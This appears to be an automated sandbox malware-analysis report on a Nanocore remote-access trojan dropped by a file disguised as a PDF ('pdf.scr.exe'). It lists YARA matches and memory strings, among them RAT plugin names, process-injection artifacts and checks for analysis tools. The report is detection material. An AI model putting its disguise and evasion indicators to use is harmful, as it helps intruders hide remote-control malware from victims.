      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CDDF1E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,2_2_0034BCF2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0036E5F8 GetUserNameW,2_2_0036E5F8
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCB146 GetVersionExW,0_2_00CCB146
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: itugx.exeBinary or memory string: WIN_81
      Source: itugx.exeBinary or memory string: WIN_XP
      Source: itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: itugx.exeBinary or memory string: WIN_XPe
      Source: itugx.exeBinary or memory string: WIN_VISTA
      Source: itugx.exeBinary or memory string: WIN_7
      Source: itugx.exeBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.Co